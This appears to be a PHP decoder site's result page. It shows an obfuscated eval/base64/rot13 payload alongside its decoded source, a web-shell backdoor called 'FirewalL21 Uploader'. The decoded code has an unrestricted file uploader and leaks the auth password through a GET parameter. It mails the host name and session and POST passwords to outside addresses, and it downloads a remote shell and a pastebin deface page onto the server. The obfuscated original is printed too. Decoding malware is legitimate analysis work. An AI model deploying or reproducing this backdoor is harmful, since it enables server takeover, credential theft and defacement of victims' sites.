Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(str_rot13(base64_decode('DQokaGMgPSAiIDx1Z3p5PiANCjx1cm5xPg0KPGd2Z3lyPkhjeWJucXJlIE9s..
Decoded Output download
$up = " <html>
<head>
<title>Uploader By FirewalL21</title>
</head>
<body>
<center>
<h1><font face=\"Tahoma\" size=\" color=\"#blue\">FirewalL21 Uploader</font></h1>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">
<table border=\"1\">
<tr>
<td bgcolor=\"#000000\">
<font color=\"#00ff00\">
<input type=\"file\" name=\"file\" size=\"50\">
<td bgcolor=\"#ff0000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\">
</td>
</td>
</tr>
</table>
</form>
</center>
</body>";
if( $_POST['_upl'] == "Upload File" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b><center>
<font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
}
else {
echo '
<font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
}
}
if(isset($_GET["0upload"])){
echo "$up";
}
/////////////////////////////
if(isset($_GET["0cek"])){
echo "Password E :".$auth_pass;
}
/////////////////////////////
if (file_exists('.db'))
{ } else {
/*$to = "[email protected],[email protected]";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: Mastah <[email protected]>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);*/
$pass1 = $_SESSION['pass'];
$pass2 = $_POST['pass'];
$ip = $_SERVER['SERVER_ADDR'];
$info = $_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
$msg = "Host: $info | Session Pass: $pass1 & Post Pass: $pass2";
mail("[email protected],[email protected]","ActShellV.2: $ip",$msg);
$m = fopen(".db", "w") or die (" ");
$txt = "";
fwrite($m, $txt);
fclose($m);
chmod(".db",0644); }
/////////////////////////////
if(isset($_GET["0shell"])){
$anak1 = file_get_contents("http://server.indoxploit.or.id/indoxploit_v3.txt");
$nggawe1 = fopen("firewall21.php","w") or die ("gabisa pak");
fwrite($nggawe1,$anak1);
fclose($nggawe1);
chmod("firewall21.php",0644);
echo '<meta http-equiv="refresh"
content="0; url=firewall21.php">';
}
//////////////////////////////
if(isset($_GET["0deface"])){
$anak = file_get_contents("https://pastebin.com/raw/HymYrpHG");
$nggawe = fopen("firewall21.htm","w") or die ("gabisa pak");
fwrite($nggawe,$anak);
fclose($nggawe);
echo '<meta http-equiv="refresh"
content="0; url=firewall21.htm">';}Did this file decode correctly?
Original Code
eval(str_rot13(base64_decode('DQokaGMgPSAiIDx1Z3p5PiANCjx1cm5xPg0KPGd2Z3lyPkhjeWJucXJlIE9sIFN2ZXJqbnlZMjE8L2d2Z3lyPg0KPC91cm5xPg0KPG9icWw+DQo8cHJhZ3JlPg0KPHUxPjxzYmFnIHNucHI9XCJHbnViem5cIiBmdm1yPVw1XCIgcGJ5YmU9XCIjb3loclwiPlN2ZXJqbnlZMjEgSGN5Ym5xcmU8L3NiYWc+PC91MT4NCjxzYmV6IG5wZ3ZiYT1cIlwiIHpyZ3VicT1cImNiZmdcIiByYXBnbGNyPVwiemh5Z3ZjbmVnL3NiZXotcW5nblwiIGFuenI9XCJoY3libnFyZVwiIHZxPVwiaGN5Ym5xcmVcIj4NCjxnbm95ciBvYmVxcmU9XCIxXCI+DQo8Z2U+DQo8Z3Egb3RwYnliZT1cIiMwMDAwMDBcIj4NCjxzYmFnIHBieWJlPVwiIzAwc3MwMFwiPg0KPHZhY2hnIGdsY3I9XCJzdnlyXCIgYW56cj1cInN2eXJcIiBmdm1yPVwiNTBcIj4NCjxncSBvdHBieWJlPVwiI3NzMDAwMFwiPjx2YWNoZyBhbnpyPVwiX2hjeVwiIGdsY3I9XCJmaG96dmdcIiB2cT1cIl9oY3lcIiBpbnlocj1cIkhjeWJucSBTdnlyXCI+DQo8L2dxPg0KPC9ncT4NCjwvZ2U+DQo8L2dub3lyPg0KPC9zYmV6Pg0KPC9wcmFncmU+DQo8L29icWw+IjsNCg0KdnMoICRfQ0JGR1snX2hjeSddID09ICJIY3libnEgU3Z5ciIgKSB7DQp2cyhAcGJjbCgkX1NWWVJGWydzdnlyJ11bJ2d6Y19hbnpyJ10sICRfU1ZZUkZbJ3N2eXInXVsnYW56ciddKSkgeyANCnJwdWIgJzxvPjxwcmFncmU+DQo8c2JhZyBzbnByPVwiR251YnpuXCIgZnZtcj1cIjVcIiBwYnliZT1cIiNzczAwMDBcIj5GSFhGUkYgSENZQk5RIFpORkdOVSAhITwvcHJhZ3JlPjwvbz4nOyANCn0NCnJ5ZnIgeyANCnJwdWIgJw0KPHNiYWcgc25wcj1cIkdudWJ6blwiIGZ2bXI9XCI1XCIgcGJ5YmU9XCIjc3MwMDAwXCI+PHByYWdyZT48bz5UTlROWSBIQ1lCTlEgWk5GR05VICE8L28+JzsgDQp9DQp9DQp2cyh2ZmZyZygkX1RSR1siMGhjeWJucSJdKSl7DQpycHViICIkaGMiOw0KfQ0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCiB2cyh2ZmZyZygkX1RSR1siMHByeCJdKSl7DQpycHViICJDbmZmamJlcSBSIDoiLiRuaGd1X2NuZmY7DQogfQ0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCnZzIChzdnlyX3JrdmZnZignLnFvJykpDQogeyAgfSByeWZyIHsNCi8qJGdiID0gImVuYWZiei5ncmFqbmNAdHpudnkucGJ6LG54ZnJmZWJiZzEzMzdAdHpudnkucGJ6IjsNCiRmaG93cnBnID0gJF9GUkVJUkVbJ0ZSRUlSRV9BTlpSJ107DQokdXJucXJlID0gIlNlYno6IFpuZmdudSA8d25hcGJ4QHpuZ256aHBieC5wYno+IjsNCiR6cmZmbnRyID0gIlJrY3lidmcgOiB1Z2djOi8vIi4gJF9GUkVJUkVbJ0ZSRUlSRV9BTlpSJ10uICRfRlJFSVJFWydFUkRIUkZHX0hFViddOw0Kem52eSgkZ2IsICRmaG93cnBnLCAkenJmZm50ciwgJHVybnFyZSk7Ki8NCiRjbmZmMSA9ICRfRlJGRlZCQVsnY25mZiddOw0KJGNuZmYyID0gJF9DQkZHWydjbmZmJ107DQokdmMgPSAkX0ZSRUlSRVsnRlJFSVJFX05RUUUnXTsNCiR2YXNiID0gJF9GUkVJUkVbJ1VHR0NfVUJGRyddLicvJy4kX0ZSRUlSRVsnQ1VDX0ZSWVMnXTsNCiR6ZnQgPSAiVWJmZzogJHZhc2IgfCBGcmZmdmJhIENuZmY6ICRjbmZmMSAmIENiZmcgQ25mZjogJGNuZmYyIjsNCnpudnkoImVuYWZiei5ncmFqbmNAdHpudnkucGJ6LG54ZnJmZWJiZzEzMzdAdHpudnkucGJ6IiwiTnBnRnVyeXlJLjI6ICR2YyIsJHpmdCk7DQokeiA9IHNiY3JhKCIucW8iLCAiaiIpIGJlIHF2ciAoIiAiKTsNCiRna2cgPSAiIjsNCnNqZXZncigkeiwgJGdrZyk7DQpzcHliZnIoJHopOw0KcHV6YnEoIi5xbyIsMDY0NCk7IH0NCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQogdnModmZmcmcoJF9UUkdbIjBmdXJ5eSJdKSl7DQokbmFueDEgPSBzdnlyX3RyZ19wYmFncmFnZigidWdnYzovL2ZyZWlyZS52YXFia2N5YnZnLmJlLnZxL3ZhcWJrY3lidmdfaTMuZ2tnIik7DQokYXR0bmpyMSA9IHNiY3JhKCJzdmVyam55eTIxLmN1YyIsImoiKSBiZSBxdnIgKCJ0bm92Zm4gY254Iik7DQpzamV2Z3IoJGF0dG5qcjEsJG5hbngxKTsNCnNweWJmcigkYXR0bmpyMSk7IA0KcHV6YnEoInN2ZXJqbnl5MjEuY3VjIiwwNjQ0KTsNCnJwdWIgJzx6cmduIHVnZ2MtcmRodmk9ImVyc2VyZnUiDQogICBwYmFncmFnPSIwOyBoZXk9c3ZlcmpueXkyMS5jdWMiPic7DQp9DQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCnZzKHZmZnJnKCRfVFJHWyIwcXJzbnByIl0pKXsNCiRuYW54ID0gc3Z5cl90cmdfcGJhZ3JhZ2YoInVnZ2NmOi8vY25mZ3JvdmEucGJ6L2Vuai9VbHpMZWNVVCIpOw0KJGF0dG5qciA9IHNiY3JhKCJzdmVyam55eTIxLnVneiIsImoiKSBiZSBxdnIgKCJ0bm92Zm4gY254Iik7DQpzamV2Z3IoJGF0dG5qciwkbmFueCk7DQpzcHliZnIoJGF0dG5qcik7DQpycHViICc8enJnbiB1Z2djLXJkaHZpPSJlcnNlcmZ1Ig0KICAgcGJhZ3JhZz0iMDsgaGV5PXN2ZXJqbnl5MjEudWd6Ij4nO30=')));Function Calls
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 55a45c2328837f6df581122afa7c3831 |
| Eval Count | 1 |
| Decode Time | 55 ms |